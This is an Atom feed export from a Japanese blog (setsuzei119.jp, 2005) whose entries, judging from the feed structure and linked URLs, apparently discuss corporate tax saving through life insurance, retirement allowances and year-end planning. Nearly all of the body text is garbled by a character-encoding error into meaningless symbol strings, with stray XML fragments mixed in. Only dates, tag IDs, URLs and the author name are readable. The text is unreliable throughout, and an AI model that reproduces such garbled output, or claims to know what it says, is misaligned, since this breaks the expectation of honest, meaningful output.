    -¡ˆZ‚נ}‚¦‚י‰ן׀‚ֵ‚ֽAc‚י”“ת‚ּ‚₪‚¿‚ֹAֵ‘־פ‚נl‚¦‚י‚ּ‚ֽ“–‘R‚ּ‚±‚ֶ‚ֵ‚µ‚ו‚₪B
    -ˆZ‘־פ‚ֽ‚¨ֿ‚‚ֵ‚·‚©B

    - -

    •K€‚ֵ‰ׂ‚¢‚¾ֵˆר‘O—˜‰v‚ּ”¼•ׂאu–@lֵv‚ֱֵ‚¦‚ִ–³‚­‚ָ‚י‚­‚ח‚¢‚ָ‚חc
    -ֵ‹א‚א—Lר‚ֹˆ—p‚³‚ך‚ך‚־‚¢‚¢‚¯‚ַA–³‘­‚¢‚־‚©‚ט‚¾‚µB
    -‚ֶAL”ן‚ג”ץ“‘‚ֹ‚ז‚ֱ‚ִ—˜‰v‚נֵ¬ְ‚ֹ—}‚¦‚ז‚₪‚ֶ‚·‚יי‹ֶ‚ֽ‘½‚¢‚ֵ‚·B

    - -

    ‚ֵ‚אA‰v‹א‚נֱ”ן‚³‚¹‚י‚¾‚¯‚ֵ‚ֽcB
    -o‰cׂ‚ֶ‚µ‚ִ‚ֽ•sˆְ‚ָ–‚א‘½‚¢‚ֵ‚µ‚ו‚₪B

    - -

    ‹‹}‚ּך‡‚ֹ”ץ‚¦u—\”ץ‘‹אv‚נ’™‚‚ִ‚¨‚­‚±‚ֶ‚אAƒƒXƒN‰ס”נ‚ּ‚½‚‚ֹ‚ֽd—v‚ָ‚±‚ֶ‚ֵ‚·B
    -‚µ‚©‚µA‹גs—a‹א‚ג”®“‘‚ֹ‚ז‚יƒLƒƒƒbƒVƒ…‚ּƒXƒgƒbƒN‚ֽA‚¢‚¸‚ך‚אuֵˆרדv‚ּ˜bB

    - -

    —¯•‹א‚ֹ‚א‰ֵ‚³‚ך‚ִ‚µ‚‚₪‚µcB
    -o‰cׂ‚ּ•‚א”’”¯‚ב‚¦‚י‚־‚©‚ט‚ֵ‚·‚ֻB
    -‚ֵ‚אA”סם‚ֹ—Lר‚ָ•–@‚ׂ ‚ט‚‚·B

    ]]> -•¥‚¢‚½‚­‚ָ‚¢‚ֶv‚ֱ‚ִ‚¢‚יֵ‹א‚נֵ¬ְ‚ֹ‚ֶ‚ַ‚‚יu—˜‰v‚ּ‘¹‹אvדv‚ֶuֵˆר‘O—˜‰v‚ּ’™’~v
    -‚ּ—¼—§‚ֵׂ‚«‚י•–@‚נA‚²‘¶’m‚ֵ‚·‚©H

    - -

    ‚»‚ך‚×Au¶–½•¯‚ּˆ—pv‚ֹ‚ז‚יA‘‹א‘־פ‚ֵֶ‘־פ‚ּ—¼—§‚ָ‚ּ‚ֵ‚·B

    - -

    «‚¢o‰cׂ‚ּ•‚ָ‚חA‚±‚ּ•–@‚ֽ‚·‚ֵ‚ֹ‚²‘¶’m‚¾‚ֶv‚¢‚‚·B
    -‚µ‚©‚µAu‚ַ‚ּ•¯‚נg‚¦‚־A‚ַ‚ך‚¾‚¯ƒLƒƒƒbƒVƒ…‚׃XƒgƒbƒN‚ֵ‚«‚י‚ּ‚©v
    -•¯₪•i‚אe׀‚‚¿‚‚¿‚¾‚µA”הr‚·‚י‚ּ‚א‘ו•ֿ‚ׂך‚י‚א‚ּ‚ֵ‚·B

    - -

    ‚±‚ס‚ָך‡‚ֽA‚»‚ּ“¹‚ּƒvƒ‚ֹ•·‚­‚ּ‚×ט‘‚¢•–@‚ֶ‚¢‚¦‚י‚ֵ‚µ‚ו‚₪B
    -•¾׀‚ֵ‚ֽ‚»‚ּƒvƒ‰ƒ“ƒjƒ“ƒO‚נu–³—¿v‚ֵ‚³‚¹‚ִ’¸‚¢‚ִ‚¨‚ט‚‚·B

    - -

    ‚µ‚­‚ֽ«‚נƒNƒƒbƒN‚µ‚ִ‚¨“ַ‚‚­‚¾‚³‚¢BEEE
    -¦ˆZ‘O‚ּo‰cׂ—l•K©Iu‘‹א‘־פƒxƒXƒgƒvƒ‰ƒ“v‚נ‘¦‚¨ט³‚ֹI@
    -@@

    ]]> -
    -
    - -‘‹אˆ—p‚ּ’ס¾I - -2005-09-07T01:18:36Z -2005-09-07T00:34:34Z -tag:setsuzei119.jp,2005://1.169 -2005-09-07T00:34:34Z -ֵ‘־פ‚נ–‘S‚ֹ‚·‚יV^•¯’a¶`ƒƒXƒN–³‚­ƒLƒƒƒbƒVƒ…‚נc‚µ‚½‚¢‚×c ‚¾‚ך‚ֵ‚א‚¨‹א‚×–³‚¢‚ז‚ט‚©‚ֽ—L‚ֱ‚½‚‚₪‚ׂ¢‚¢‚ֶv... - -b-admin - - - -¶–½•¯ - -ֵ‘־פ‚נ–‘S‚ֹ‚·‚יV^•¯’a¶`ƒƒXƒN–³‚­ƒLƒƒƒbƒVƒ…‚נc‚µ‚½‚¢‚×c

    - -

    ‚¾‚ך‚ֵ‚א‚¨‹א‚×–³‚¢‚ז‚ט‚©‚ֽ—L‚ֱ‚½‚‚₪‚ׂ¢‚¢‚ֶv‚₪‚ֵ‚µ‚ו‚₪B
    -„‚א‚»‚₪v‚¢‚‚·B
    -‚ֵ‚ֽAƒƒXƒN–³‚µ‚ֹ­‚µ‚ֵ‚א‘½‚­‚ּƒLƒƒƒbƒVƒ…‚נc‚µ‚½‚¢‚ֶv‚¢‚‚¹‚ס‚©H

    - -


    -‚»‚ּ‚ז‚₪‚ֹv‚ם‚ך‚½•‚ֽA‚‚¸A‚±‚¿‚ח‚נ‚¨“ַ‚‚­‚¾‚³‚¢B
    -o‰cׂ‚ּ•‚ֲּl‘Y‚נֵ‘ו‰»‚·‚י‚½‚‚ּ’ט”װ‚ֶ‚א¾‚¦‚י•–@‚ב‚©‚ך‚ִ‚¢‚‚·B
    -¦ֵ‘־פ‚נ–‘S‚ֹ‚·‚יV^•¯’a¶

    - -


    -‚±‚ך‚ֽ‘½‚­‚ּo‰cׂ‚ּ•‚ֹז‚ט“‚ך‚ח‚ך‚ִ‚¢‚‚·B
    -«‚­ֵ‚·‚י‚±‚ֶ‚ֹ‚ז‚טA“‚ב‚¦‚ָ‚­‚ִ‚א‚ז‚ט‘½‚­‚ּƒLƒƒƒbƒVƒ…‚נc‚·‚±‚ֶ‚ֵׂ‚«‚י‚ּ‚ֵ‚·B

    - -

    ֵ‘־פ‚ּƒvƒ‚ֹ‚ז‚ך‚־Aֵ‚אֵר‰‚ׂ‚­Aֵ‚א‘½‚­‚ּƒLƒƒƒbƒVƒ…‚נc‚¹‚י•–@‚ֶ‚µ‚ִ‚ֽA‚±‚ך‚ח‚Qם—‚ּ•¯‚נˆ—p‚·‚יˆָO‚ֹ‚ֽ‚ָ‚¢‚ֶ‚¢‚¢‚‚·B

    ]]> -©•ֹׂ‚ֽ‚ַ‚¿‚ח‚ּ•¯‚ּƒ^ƒCƒv‚דK‚µ‚ִ‚¢‚י‚©‚ֹ‚ֲ‚¢‚ִ‚ֽA”N—מ‚ג•¯תװA•¯‹אz“™‚ּנ‚ֹ‚ז‚ט•ֿ‚ם‚ֱ‚ִ‚«‚‚·B

    - -

    ‚µ‚­’m‚ט‚½‚¢‚ֶv‚¢‚‚¹‚ס‚©H
    -ף–]ׂ‚ֹ‚ֽio‰cׂ‚ְֹ‚טjA“ת–{‘S‘‚ַ‚±‚ֵ‚א–³—¿‚ֵA‚µ‚¢‰נא‘—¿‚נ‚¨‘—‚ט‚µ‚‚·B
    -‚‚½A‡‚ם‚¹‚ִֵ“K‚ָƒvƒ‰ƒ“‚ּƒVƒ~ƒ…ƒ[ƒVƒ‡ƒ“‚אל¬’v‚µ‚‚·‚ּ‚ֵA¥”סA‚¨\‚‚­‚¾‚³‚¢B

    - -

    ‚¨\‚‚ֽ‚±‚¿‚ח‚ײ
    -iˆך”װ‰÷‚ּƒtƒH[ƒ€‚ײ‚²‹L“‚ּדA‘—M‚µ‚ִ‚­‚¾‚³‚¢Bj

    - -


    -ƒLƒƒƒbƒVƒ…‚נc‚·ֵ“K‚ָ•–@‚×–‚ּ‘O‚ֹ‚ ‚ט‚‚·B
    -‚÷‚׀A‘—¿‚נ‚²Ql‚ֹˆ—p‚נ‚²“¢‚­‚¾‚³‚¢B

    - -

    ‚µ‚­‚ֽ«‚ז‚טEEE
    ֵ‘־פ‚נ–‘S‚ֹ‚·‚יV^•¯’a¶

    ]]> -
    -
    - -¶–½•¯‚נˆ—p‚µ‚½‘E‹א€”ץ - -2005-06-09T08:03:16Z -2005-06-09T06:07:25Z -tag:setsuzei119.jp,2005://1.168 -2005-06-09T06:07:25Z -‘E‹א‚ֵֽ‚ֹ‚ֽ—Lר‚ֵ‚·‚×A‘½z‚ּ‘‹א‚נ•K—v‚ֶ‚µ‚‚·B ‚±‚ּ‚½‚€–S‘E‹א‚ֽ¶–½•¯‚ֵ‘־‰‚·‚י‚µ‚©‚ ‚ט‚‚¹‚סB ‚»‚ך‚ֵ‚ֽ... - -b-admin - - - -–נˆץ‘E‹א - -‘E‹א‚ֵֽ‚ֹ‚ֽ—Lר‚ֵ‚·‚×A‘½z‚ּ‘‹א‚נ•K—v‚ֶ‚µ‚‚·B
    -‚±‚ּ‚½‚€–S‘E‹א‚ֽ¶–½•¯‚ֵ‘־‰‚·‚י‚µ‚©‚ ‚ט‚‚¹‚סB

    - -

    ‚»‚ך‚ֵ‚ֽ‰ן׀‚נ_–סׂA–נˆץE]‹ֶˆץ‚נ”ם•¯ׂ‚ֶ‚·‚י¶–½•¯‚ֽA‚ַ‚ס‚ָם—‚×—ַ‚¢‚ּ‚ֵ‚µ‚ו‚₪‚©B

    - -

    y€–S‘E‹אm•z‚ּ‚½‚‚ָ‚חA•¯—¿‚א„ˆְ‚ֵ‘Sz‘¹‹אZ“‚ֵ‚«‚י’טת•¯‚×—ַ‚¢‚ֵ‚µ‚ו‚₪B
    -i‚½‚¾‚µ|‚¯ּ‚ִ‚ֵ’†“r‰נ–ס‚µ‚½ך‡A•װ–‹א‚ֽ‚‚ֶ‚ס‚ַ—L‚ט‚‚¹‚סjB

    - -

    ¶‘¶•¯‹א‚נA¶‘O‚ּ‘E‹א‚ֹ“–‚ִ‚י‚ֲ‚א‚ט‚ָ‚חA’™’~«‚ּ—L‚י—{˜V•¯‚×—ַ‚¢‚ֵ‚µ‚ו‚₪i‚½‚¾‚µAמ–{“I‚ֹo”ן‚ֹ‚ֵ‚«‚ָ‚¢‚ּ‚ֵ’ˆ׃‚וK—v‚ֵ‚·jB

    ]]> -€–S‘E‹א‚נl‚¦‚ָ‚ׂחAy¶‘O‚ּ‘E‹א‚אl‚¦‚יz‚ּ‚ֵ‚ ‚ך‚־A
    -o”ן‚ֹ‚ֵ‚«‚י‹אz‚×1/2‚א‚ ‚יw ’· ת •½ € ’ט ת • ¯ x~~~~~~~~~~~~~~~~~~~~~~~~~~~

    - -

    y‘Szo”ן‚ֹ‚ָ‚י‚ּ‚ֹ’™’~«z‚×—L‚טA|‚¯‚ִ‚·‚®‚ֹ€–S‚µ‚½ך‡‚ֵ‚אA
    -•¯—¿‚ּ„‚ֹ•¯‹א‚×­‚ָ‚¢w ’ ‘ ’ט ת • ¯ x ~~~~~~~~~~~~~~~~~~~~~~~~~~

    - -

    ‚‚½A

    - -

    y‘Sz•¯—¿‚×o”ן‚ֹ‚ָ‚יz‚ּ‚ֹA‰נ–ס•װ–‹א‚ּ‚‚¢
    -w ƒK ƒ“ • ¯ x~~~~~~~~~~~~~~~~~~~~~~~~~~

    - -

    ‚ָ‚ַA—lX‚ָ‚א‚ּ‚ׂ ‚ט‚‚·B

    - -

    ‚±‚ּ‚ז‚₪‚ָe•¯‚ּ“ֱ’¥‚נ—ַ‚­l‚¦‚ִ‰ֱ“‚·‚י•K—v‚ׂ ‚ט‚‚·B

    - -

    ¶–½•¯‚ֹ‚ז‚יֵE‘E‹א€”ץ‚ֽA–“I‚ֹ‚ז‚ט‘I‘נ‚·‚י₪•i‚וֿ‚ם‚ט‚‚·B

    - -

    ‚‚½•¯‰ן׀‚ֹ‚ז‚ט“א—e‚אˆב‚¢‚‚·‚ּ‚ֵA•¯‚ּך–ו‰ֶiƒtƒ@ƒCƒiƒ“ƒVƒƒƒ‹Eƒvƒ‰ƒ“ƒi[j‚ֹ‘’k‚·‚י‚±‚ֶ‚נ‚¨§‚’v‚µ‚‚·B

    - -


    -¥‚ ‚ָ‚½‚ּuֵ‘־פ‚ּ‹^–ג‚ֹ‚ֲ‚¢‚ִ‚¨“‚¦‚µ‚‚·¥
    - http://www.teizouteiki.jp/

    ]]> -
    -
    - -wˆZ‘־פx‚ּ‘¹‚·‚יֵE“¾‚·‚יֵ - -2005-05-18T00:18:16Z -2005-05-17T00:42:58Z -tag:setsuzei119.jp,2005://1.166 -2005-05-17T00:42:58Z -wˆZ‘־פx‚ֶ‚µ‚ִA’†¬י‹ֶ@o‰cׂ‚×l‚¦‚ָ‚­‚ִ‚ֽ‚ָ‚ח‚ָ‚¢‚±‚ֶ‚ֽ‰½‚ֵ‚µ‚ו‚₪‚©? - -b-admin - - - -ˆZ‘־פ - -wˆZ‘־פx‚ֶ‚µ‚ִo‰cׂ‚×l‚¦‚ָ‚­‚ִ‚ֽ‚ָ‚ח‚ָ‚¢‚±‚ֶ‚נִ“x‘‚©‚¹‚ִ‚¢‚½‚¾‚«‚‚·B

    - -


    -‰ן׀‚ּ‹ֶׁ‚ׂז‚¢‚ֹ‰z‚µ‚½‚±‚ֶ‚ֽ‚ ‚ט‚‚¹‚סB
    -‚»‚ך‚ֵ‚אˆZ‘O‚ּ–‘O—\‘ֵׂA‘z’טˆָד‚ּ—˜‰v‚×o‚ִ‚¢‚י‚ֶ‚«‚ֽuֵ ‘־פv‚ֶ‚¢‚₪ƒL[ƒ[ƒh‚×–‚ּ‘O‚ֹ‚¿‚ח‚ֲ‚¢‚ִ‚­‚י‚ּ‚ֵ‚ֽ‚ָ‚¢‚ֵ‚µ‚ו‚₪‚©B

    - -

    wˆZ‘־פx‚ֶ‚µ‚ִ‚א”[ֵ‘‹א‚ּ”Po‚דּׂ’ֹ‚¢–ג‘ט‚ֶ‚µ‚ִ”­¶‚µ‚‚·B

    - -

    ´‘¥‚ֶ‚µ‚ִ–‹ֶ”N“xI—¹ד‚Q‚©ˆָ“א‚ֹ–@lֵA–@lZ–¯ֵA–@l–‹ֵֶ‚ּm’ט\‚נ‚µA”[ֵz‚ׂ ‚ך‚־Aֵ‹א‚נ”[•t‚µ‚ָ‚¯‚ך‚־‚ָ‚ט‚‚¹‚סB

    ]]> -‚א‚µA‚ ‚ָ‚½‚ּo‰c‚·‚י‰ן׀‚×5ˆZ‚ּך‡‚ֽA7‚ֹ‚ֽ”[ֵ‚·‚י•K—v‚ׂ ‚ט‚‚·B

    - -

    ‚ֶ‚±‚כ‚ֵA¡‚©‚ח‚ֵ‚א’x‚­‚ָ‚¢AwˆZ‘־פx‚ֶ‚¢‚₪‚±‚ֶ‚ֵA‚½‚ֶ‚¦‚־eם‚ּˆר“–‹א‚ּvד‚ּ—v‚נ–‚½‚¹‚־‘¹‹אZ“‚ֵ‚«‚‚·B
    -‚±‚ך‚ֽA¡‚©‚ח‚ֵ‚א’x‚­‚ָ‚¢ˆZ‘־פ•–@‚ּ‚׀‚ֶ‚ֲ‚ֶ‚¢‚¦‚‚·B

    - -

    ‚‚½ALי“`”ן‚ָ‚ַ‚אֵƒƒƒbƒg‚ֶA”ּ”„‘£i‚ּר‰‚ׂ ‚י‚ֵ‚µ‚ו‚₪B

    - -

    ֵ‹‚ֽA–@lֵ—¦“™‚ּˆר‰÷‚°‚×s‚ם‚ך‚ִ‚¢‚י‚½‚A‚ַ‚ּת‚ּ“¾‚ֹ‚ָ‚י‚ּ‚©‚×Hd—v‚ָƒ|ƒCƒ“ƒg‚ֶ‚ָ‚ֱ‚ִ‚«‚‚·‚×Ao‰cׂ‚ֶ‚µ‚ִ‚ֽo‰cְ‘װ‚ֹ‘₪‚µ‚½ֵ•–@‚ֹ‚ֲ‚¢‚ִl‚¦‚ָ‚­‚ִ‚ֽ‚ָ‚ח‚ָ‚¢‚ֵ‚µ‚ו‚₪B

    - -


    -‚µ‚¢eםˆר“–‹אJ“‚ֹ‚ז‚יwˆZ‘־פxAwֵ‘־פx‚ֹ‚ֲ‚¢‚ִ‚ֽ
    -eםˆר“–‹אJ“‚ֹ‚ז‚יֵ‘־פ
    -http://setsuzei119.jp/archives/2005/01/post_50.html
    -‚נ‚²——‚­‚¾‚³‚¢B

    - -


    -ֵט’i‚ֶ‚µ‚ִ‚ֽA

    - -

    ‚Pj—˜‰v‚נ¸‚ח‚·
    -‚Qj”ן—p‚נ‘‚ג‚·

    - -

    ‚ֶ‚¢‚₪A‚Q‚ֲ‚ּ‚ג‚ט•‚×ו‚ָ‚א‚ּ‚ֵ‚·B

    - -

    ‚×AwˆZ‘־פx‚ּ‚½‚‚ֹ—˜‰v‚נ¸‚ח‚·‚ֶ‚¢‚ֱ‚ִ‚אA‚·‚ֵ‚ֹ”­¶‚µ‚½‚א‚ּ‚נ–³‚­‚·‚ם‚¯‚ֹ‚ֽ‚¢‚«‚‚¹‚סB

    - -

    ‚µ‚©‚µA—‚ת‚ֹw¡ת¸‚ח‚µ‚½—˜‰v‚נxJ‚ט‰z‚·‚±‚ֶ‚ֽ‚ֵ‚«‚‚·B
    -‚½‚ֶ‚¦‚־A‘Sz‘¹‹אZ“‚ֵ‚«‚י•¯(—בE’‘’טת•¯)‚ֹ‰ֱ“‚µ‚ִA«—ˆA‘‹אש—v‚×”­¶‚µ‚½‚ֹ‚ֽA‚»‚ּ•¯‚ּ‰נ–ס•װ–‹א‚נ[‚ִ‚י‚ֶ‚¢‚₪‚ּ‚א—Lר‚ָ•–@‚ֵ‚·B

    - -

    ’‘’טת•¯‚ֹ‚ֲ‚¢‚ִ‚ֽ‚±‚¿‚ח‚נ‚²——‚­‚¾‚³‚¢B

    - -

    ‚±‚ּזA‰½‚׋N‚±‚י‚©‚ם‚©‚ח‚ָ‚¢ף‹µ‚ּ’†Aי‹ֶ‚ּƒLƒƒƒbƒVƒ…ƒtƒ[‚נ‰~‚ֹ•‚ֲ‚½‚‚ּu•¯v‚ֶ‚µ‚ִֵ‘P‚ּ•–@‚ּˆך‚ֲ‚ֵ‚ ‚י‚ֶl‚¦‚‚·B

    - -


    -”ן—p‚נ‘‚ג‚·•–@‚ֹ‚ֽAxo‚נ”÷‚ָ‚₪ך‡‚ֶ”÷‚ָ‚ם‚ָ‚¢ך‡‚ׂ ‚ט‚‚·B
    -ֵ‹א‚נ•¥‚¢‚½‚­‚ָ‚¢‚©‚ח‚ֶ‚¢‚ֱ‚ִAxo‚נ”÷‚ָ‚₪ך‡‚ֽA‚©‚¦‚ֱ‚ִ‘‹אJ‚ט‚נˆ«‰»‚³‚¹‚ִ‚µ‚‚₪ƒP[ƒX‚א‚ ‚ט‚‚·‚ּ‚ֵ’ˆ׃‚וK—v‚ֵ‚·B

    - -


    -wˆZ‘־פx‚ֹײ‚·‚י‚¨–ג‚¢‡‚ם‚¹‚ֽ‚±‚¿‚ח‚‚ֵB
    -http://setsuzei119.jp/form.html
    -

    ]]> -
    -
    - -•¯‚ֽ’P‚ָ‚יֵ‚ֵ‚ֽ‚ָ‚­‘‹א‘־פ - -2005-05-17T00:26:25Z -2005-05-13T09:47:58Z -tag:setsuzei119.jp,2005://1.165 -2005-05-13T09:47:58Z -ז“ת‚ ‚יo‰cׂ‚©‚ח‚ּ“א—e‚ּ‚¨–ג‚¢‡‚ם‚¹‚נ‚¢‚½‚¾‚«‚‚µ‚½B ƒrƒWƒlƒXƒlƒbƒgƒ[ƒN׀‚ּ©‚‚י‘Sz‘¹‹א‚ּ¶–½•¯‚נAֵ‘־פ... - -b-admin - - - -ˆZ‘־פ - -ז“ת‚ ‚יo‰cׂ‚©‚ח‚ּ“א—e‚ּ‚¨–ג‚¢‡‚ם‚¹‚נ‚¢‚½‚¾‚«‚‚µ‚½B

    - -

    ƒrƒWƒlƒXƒlƒbƒgƒ[ƒN׀‚ּ©‚‚י‘Sz‘¹‹א‚ּ¶–½•¯‚נAֵ‘־פ‚ֵ“¢‚µ‚½‚ֶ–גֵ—m‚ֹ‘’k‚µ‚½‚ֶ‚±‚כA–גֵ—m‚©‚ח‚ֽAu ³’¼¾‚ֱ‚ִA‚‚ֱ‚½‚­ˆ׃–¡‚ָׂ‚¢v‚ֶ¾‚ם‚ך‚‚µ‚½B

    - -

    ‚»‚ּ——R‚ֶ‚ֽA

    - -

    ֵ‹א‚נ•¥‚¢‚½‚­‚ָ‚¢‚ֶ‚¢‚₪o‰cׂ‚ּS—‚נI‚‚ֹ—˜—p‚µAˆZ‘־פ‚ֶּ‚µ‚ִ‚z‚ָ•¯‚נ”„‚ט‚ֲ‚¯‚ז‚₪‚ֶ‚µ‚ִ‚¢‚יB

    - -

    ‚‚µ‚ִ‚ג‰ןv––±‚ֶƒOƒ‹‚ֹ‚ָ‚ֱ‚ִ‚ג‚ֱ‚ִ‚¢‚י•¯‘ד—“X‚א‚ ‚טAD‚‚µ‚­‚ָ‚¢ B

    - -

    ‰נ–ס‚·‚י‚ֶ‚«‚ֹG“‚ֹ‚ָ‚ך‚־A‚»‚±‚ֵֵ‹א‚ׂ©‚©‚טֵר‰‚ֽ‚‚ֱ‚½‚­‚ָ‚­‚ָ‚י‚ּ‚ֵ‚ֽ‚ָ‚¢‚©B

    - -

    —˜‰v‚×o‚½‚חֵ‹א‚נ•¥‚₪Bc‚ֱ‚½‚¨‹א‚נ’™‹א‚µ‚½•‚׋‰“I‚ֹ‚¨‹א‚ֽ‘‚¦‚יB

    - -

    ‚ֶ¾‚₪‚ּ‚ֵ‚·Bm‚©‚ֹ–גֵ—m‚³‚ס‚ּ‚¨‚ֱ‚µ‚ב‚י‚±‚ֶ‚אװˆב‚¢‚ֵ‚ֽ‚ ‚ט‚‚¹‚סB
    -

    ]]> -—ב‚¦‚־A–ˆת‚T‚O‚O‚O–‰~‚ֵּˆר‘O—˜‰v‚נo‚µ‚ִ‚¢‚י‰ן׀‚ׂ ‚י‚ֶ‚µ‚‚·B
    -‚»‚ּ‚‚\‚µAֵˆרד—˜‰v‚ׂR‚O‚O‚O–‰~c‚טA‚T”No‰‚·‚י‚ֶ‚P‰­‚T‚O‚O‚O–‰~‚ּ“א•”—¯•‚ֵ‚«‚½‚ֶ‚µ‚µ‚‚·B

    - -


    -ˆך•Aֿ‹ֹ“I‚ֹ•¯‚נˆ—p‚µ‚½ך‡‚ַ‚₪‚ָ‚י‚©‚נ”הr‚µ‚ִ‚‚‚µ‚ו‚₪B

    - -


    -—˜‰v‚T‚O‚O‚O–‰~‚ּ‚₪‚¿‚R‚O‚O‚O–‰~‚נ•¯—¿‚ֶ‚µ‚ִ”ן—p‰»‚µ‚‚µ‚½BֵI—˜‰v‚ׂQ‚O‚O‚O–‰~‚ֶ‚ָ‚טAֵˆרד—˜‰v‚P‚Q‚O‚O–‰~‚דא•”—¯•‚³‚ך‚‚·B‚±‚ך‚נ‚T”Nװ‘±‚¯‚י‚ֶA•¯‚ּ‰נ–ס•װ–‹א‚ׂP‰­‚R‚T‚O‚O–‰~(ֵˆר‘O)B“א•”—¯•‚ׂP‚Q‚O‚O–‰~~‚T”N‚ֵ‚U‚O‚O‚O–‰~B

    - -


    -–נˆץ‚ּ‘E‚ָ‚ַ‚ּ‚z‚ָ”ן—p‚ּ”­¶‚ָׂ‚¢‚ּ‚ֵ•¯‚נ‚¢‚ֱ‚½‚ס‰נ–ס‚·‚י‚ֶA‚P‰­‚R‚T‚O‚O–‰~‚ּG“‚ֶ‚ָ‚טAֵˆרד—˜‰v‚W‚P‚O‚O–‰~‚ֶ‚‘Y‚ֶ‡v‚ֵ‚P‰­‚S‚P‚O‚O–‰~‚ֵ‚·B

    - -


    -•¯‚נg‚ם‚ָ‚©‚ֱ‚½ך‡‚ׂP‰­‚T‚O‚O‚O–‰~‚ֵ•¯‚נg‚ֱ‚½ך‡‚ׂP‰­‚S‚P‚O‚O–‰~‚ֵ‚·B‚µ‚½‚ֱׂ‚ִ•¯‚נg‚ם‚ָ‚©‚ֱ‚½‚‚₪‚ד¿‚¾‚ֶ‚¢‚₪‚±‚ֶ‚ֹ‚ָ‚ט‚‚·B‚±‚ך‚ֽ•¯‚ּ‰נ–ס•װ–‹א‚ׂP‚O‚O“–‚ֱ‚ִ‚±‚ָ‚¢•ב¹‚¾‚ֶ‚¢‚₪‚±‚ֶ‚ֵ‚·B

    - -


    -‚µ‚©‚µ’P‚ָ‚יֵ‚ֶ‚¢‚₪ֿ“_‚ֵ‚ֽ‚ָ‚­A‘‹אJ‚ט‚ֶo‰cv‰זA‚³‚ח‚ֹi‹CE‹ֶׁ‚ּ”gA—\ת‚¹‚ ƒƒXƒN‚נ‘‡”»’f‚µ‚ִƒoƒ‰ƒ“ƒX‚ז‚­ˆ—p‚·‚י‚ֶ‚¢‚₪‚±‚ֶ‚ֵ‚·B‰½ּ‚ָ‚חA‚T”Nד‚P‚O”NדA‰ן׀‚נז‚טׂ­ֲ‹«‚ַׂ‚₪‚ָ‚ֱ‚ִ‚¢‚י‚©‘z‘‚ֵ‚«‚‚·‚©H–¾m‚ֹ’f¾‚ֵ‚«‚י‚ֶ“‚¦‚י‚±‚ֶ‚ֽ‚ֵ‚«‚‚¹‚סB‘z‘‚א‚µ‚ָ‚©‚ֱ‚½‚±‚ֶ‚׋N‚«‚י‚©‚א‚µ‚ך‚‚¹‚סB

    - -


    -‚»‚ּ‚ז‚₪‚ָ—\‘וs‰ֲ”\‚ָ–‘װ‚ֹ‚ָ‚ֱ‚½‚ֶ‚µ‚ִ‚אA‰ן׀‚נ“|Y‚³‚¹‚י‚ם‚¯‚ֹ‚ֽ‚¢‚«‚‚¹‚סB‰ן׀‚ד|Y‚·‚י‚ּ‚ֽ•‚©װ‚©‚ֵ‚ֽ‚ָ‚­A‘‹א‚וs‘«‚µ‚ִ‚µ‚‚₪‚©‚ח‚ֵ‚·B

    - -


    -—˜‰v‚×o‚½‚חֵ‹א‚נ•¥‚₪(״‚ט‚ִ‚ֵ‚א)‚ֶ‚¢‚₪ˆ׃©‚נˆ‚µ‚ִ”’ט‚µ‚ִ‚¢‚י‚ם‚¯‚ֵ‚ֽ‚ ‚ט‚‚¹‚סB‚µ‚©‚µAo‰c‚׋ך‚µ‚¢‚ֶ‚«‚ֹ‰‹‚ֹx•¥‚ֱ‚½ֵ‹א‚נֵ–±‚ֽ•װ‚µ‚ִ‚­‚ך‚י‚ֵ‚µ‚ו‚₪‚©Ho‰cׂ‚×–ˆך‚ּך‡Aֵ–±‚ֽ‰ֶ‘°‚ג]‹ֶˆץAזˆרז‚נח‚ֱ‚ִ‚­‚ך‚‚¹‚סB

    - -

    ‚ז‚₪‚·‚י‚ֹA‚‘Y(•כO‘Y)‚×י‹ֶo‰c‚ֹ‚ֶ‚ֱ‚ִ‘ו״‚¾‚ֶ‚¨“`‚¦‚µ‚½‚¢‚ּ‚ֵ‚·B

    ]]> -
    -
    - -ˆZת––‚ֹ‘¹‹אZ“‚ֽ‰ֲ”\‚©H - -2005-05-13T05:08:00Z -2005-04-22T09:23:28Z -tag:setsuzei119.jp,2005://1.164 -2005-04-22T09:23:28Z -ˆZ‘־פ‚ֵo‰cׂ‚ּ•‚ֹ’m‚ֱ‚ִ‚¢‚½‚¾‚«‚½‚¢’‘’טת•¯“™‚ּˆ—p–@“™‚נא–¾‚µ‚‚·B - -b-admin - - - -ˆZ‘־פ - -uˆZv‚ֽA‹ֶׁˆ«‰»‚ּי‹ֶ‚ֹ‚ֶ‚ֱ‚ִ‚ֽ“ּׂ’ֹ‚¢ת‚ֵ‚·‚×Aˆך•‚ֵA‚±‚ּ•s‹µ‰÷‚ֵ‚אg—\‘zˆָד‚ֹ‹ֶׁ‚×L‚ׁ‚½h‚ֶ‚¢‚₪י‹ֶ‚×­‚ָ‚©‚ח‚¸‚ ‚י‚ּ‚א–ְ‚ֵ‚·B

    - -

    ’†¬י‹ֶ‚ֵ‚ֽAo‰cׂ‚×”„ד‚ֶ»—a‹אc‚‚¾‚¯‚נ©‚ָ‚ׂחo‰c‚נs‚ָ‚ֱ‚ִ‚¢‚יƒP[ƒX‚ב½‚­A\‚ֹ‰‚‚ִ—˜‰v‚ֵֶ‹א‚×”»–¾‚µ‚‚·‚ּ‚ֵA‚»‚ּ’i‚ֵ”[ֵ‘‹א‚ּט”z‚נs‚ָ‚₪‚±‚ֶ‚ֹ‚ָ‚ט‚‚·B

    - -

    –‹ֶ”N“x‚×I—¹‚µA\’iK‚ֹ‚ָ‚ֱ‚ִ‰‚‚ִֵ‹א‚ּ‚±‚ֶ‚נS”z‚µ‚ִ‚א‚ַ‚₪‚ֹ‚א‚ָ‚ט‚‚¹‚סB
    -‚±‚₪‚µ‚½‚±‚ֶ‚ֹ‚ָ‚ח‚ָ‚¢‚½‚‚ֹ‚אA’טת“I‚ֵֹ—m‚ָ‚ַ‚ּך–ו‰ֶ‚ּƒAƒhƒoƒCƒX‚נף‚¯‚י‚±‚ֶ‚ֽ“–‘R‚ֶ‚µ‚ִAƒMƒƒMƒ‚ּƒ^ƒCƒ~ƒ“ƒO‚ֵˆ—p‚³‚ך‚י‚א‚ּ‚ּ‚׀‚ֶ‚ֲ‚ֶ‚µ‚ִy¶–½•¯z‚×—Lר‚ֵ‚·B

    - -

    ‚»‚ּy¶–½•¯zˆ—p‚ּר‰‚ֶ’ˆ׃“_‚ֹ‚ֲ‚¢‚ִִ“xm”F‚µ‚ִ‚‚‚µ‚ו‚₪B
    -‚µ‚­‚ֽ‘±‚«‚נ‚¨“ַ‚‚­‚¾‚³‚¢B

